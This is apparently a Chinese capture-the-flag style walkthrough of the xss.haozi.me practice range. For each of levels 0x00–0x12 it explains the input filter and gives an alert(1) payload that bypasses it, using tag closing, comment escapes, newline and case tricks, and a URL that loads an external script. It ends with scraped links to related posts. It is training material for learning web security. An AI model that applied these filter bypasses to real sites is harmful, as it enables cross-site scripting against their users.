XSS靶场(二)xss.haozi
靶机地址:https://xss.haozi.me
0x00
无防
<script>alert(1)</script>
0x01
在<textarea>标签这个标签内,所有的脚本语言都是字符串,不能被调用执行,闭合标签即可;
</textarea><script>alert(1)</script>
0x02
闭合" 和< 即可
"><script>alert(1)</script>
aaa" onclick="alert(1)
0x03
正则表达式,将 () 替换为空,用 `` 代替即
<script>alert`1`</script>
0x04
正则表达式,将 () `` 替换为空,HTML实体编码 (;);
<svg><script>alert(1)</script>
0x05
这里用正则替换了-->,
html的注释符有2种写法:
<!-- 注释的内容 -->
另一种是<!-- 注释的内容 --!>
--!><script>alert(1)</script>
0x06
这里正则替换的是auto和on.*=和>字符,所以过滤了js的autofocus事件以及 on开头的事件;
但没有过滤换行,可以利用HTML的容错机制,只要关键字和语法正确,不受空格和换行符影响的特性
onclick
=alert(1)onmousedown
=alert(1)type=image src=1 onerror
=alert(1)
0x07
正则 <\/?[^>]+> 这一堆,以 "<" 开头 ">" 结尾中间穿插非 ">" 的不分大小写的字符串,
总的来说,就是替换 </ 任意字符 > 为空。用<svg标签和THTML容错机制不写 ">" 即可
<svg onload=alert(1)//<svg onload=alert(1)\n<img src=1 onerror="alert(1)"
0x08
用正则过滤了</style>,致使无法闭合;
和6 7题类似,还是利用HTML的容错给</style 后面加空格或回车
</style ><script>alert(1)</script></style
><script>alert(1)</script>
0x09
用正则规定输入的字符串种必须有https://www.segmentfault.com1;
那就再在后面写," 闭合 ></script> 闭合,再注掉 ">
https://www.segmentfault.com1"></script><script>alert(1)//
0x0A
于上一题类似,另外把 ' " < > / 都过滤了
在网址中间使用@符号,将重定向到@后面的域URL;(谷歌貌似有个保护机制,在火狐试)
https://www.segmentfault.com@xss.haozi.me/j.js
0x0B
把输⼊的字符串都转⼤写了;
html对大小写不敏感,JS对大小写敏感;
用<svg οnlοad=alert(1)>,对 'alert' 实体编码;
<svg onload=alert(1)>
0x0C
和上一题类似,只是多了个对script 的过滤;
如果用<script>,双写即可;
<svg onload=alert(1)><sscriptcript src=1 onerror=alert(1)></sscriptcript>
0x0D
正则过滤了 < / " ' ,可以不用;
回车逃逸单行注释,再注掉多余的 ‘)
这里回车
alert(1)
-->
0x0E
这里的正则匹配<a-zA-Z>,还给< 后面加上了_, 并且转大写,这几乎过滤了所有的标签;
所以要用到一个奇技淫巧:有这样一个字符 ſ ,它在转大写后会变成S;
<ſcript src=1 onerror=alert(1)></script><ſvg onload=alert(1)>
0x0F
这里和第十题差不多,将 & ' " <> / 给HTML实体编码了;
但值得注意的是,我们输入的字符仍处于html中,因此即使被编码也可以执行其功能;
闭合前后 (' ') 或注掉 即可;
');alert(1);('
0x10
无防,给data个值即可;
');alert(1);('
0x11
和15题一样,把 / ’ " ` < > \ 以及换行等给转义了;
闭合前后 (" ") 即可;
在JS代码里对 / 的转义其实是多此一举,在实际使用中,/ 并非特殊符号,无需转义,可直接输出
");alert(1);("");alert(1);//
0x12
将 " 给转义了;
我要双引号干啥,直接闭合前面的<script>,再把后面的 ') 给注掉 即可;
也可以将 \ 给转义,让其失效,再闭合 ("
</script><script>alert(1)//a\");alert(1);//
ok搞定!个人习惯不同,答案不唯一,如果有不同解法,欢迎大家分享!
XSS靶场(二)xss.haozi相关推荐
- xss靶场、xss.haozi.me靶场详细通关教程
文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...
- xss靶场练习(二)之xss小游戏
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路. xss小游戏在线地址: http://test.ctf8.com/ xss小游戏一共二十关. ...
- 【XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主. DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别 ...
- 靶场通关-XSS挑战之旅(1-5)
目录 靶场搭建 欢迎来到XSS挑战 第一关 第二关 第三关 第四关 第五关 靶场搭建 直接使用在线靶场 网址:https://xss.angelo.org.cn 本地搭建xss靶场,这个简单百度吧 欢 ...
- Pikachu靶场:XSS盲打
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器.Burp Suite.Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果 ...
- XSS靶场prompt.ml过关详解
XSS靶场prompt.ml过关详解 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0 ...
- 反射型XSS靶场练习
DVWA靶场 第一关:low 直接一条<script>alert(1)</script>看看结果,很简单直接过关 第二关:Medium 继续接着一条<script> ...
- XSS靶场level15详细通关教程
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场.可是做到第15关的时候,怎么也无法通关.我这个朋友在15关卡住了2天.最后终于找到了问题的根源.[这个朋友使用的是在线靶场,如果你是自己搭 ...
- XSS学习-pikachu靶场之xss
XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击 ...
- xss-labs靶场实战全通关详细过程(xss靶场详解)
目录 level 1 level 2 level 3 level 4 level 5 level 6 level 7 level 8 level 9 level 10 level 11 level 1 ...
最新文章
- “中台不就是微服务吗?有啥区别?”
- Error in configuration process解决方法
- 超级简单的配置虚拟机网络yum源
- Java基础知识强化之IO流笔记13:递归之不死神兔问题(斐波那契数列)
- 网易严选Java开发三面面经:mysql索引面试题
- Javacript和AngularJS中的Promises
- RTOS原理与实现02:基本任务切换实现
- git reset --hard命令小结
- 阿里云原生“因云而生”心智大图重磅发布
- Tornado介绍及自定义组件
- 2021秋招----hr面试总结
- tensorflow实现非线性拟合
- 【Hive】解析复杂json格式字段
- 湖北武汉施工员报考排给水和电气的施工方法建筑七大员报考
- 原生js绑定事件的三种方法
- 组网方案设计,运用Mesh组网实现无缝漫游!
- Tensorflow
- 单片机c语言中sbuf的定义,SBUF的详细介绍!(51单片机)
- 游戏陪玩App,如雨后春笋般冒出,直接导致整个游戏陪玩源码市场的持续火爆
- 【配置JAVA环境】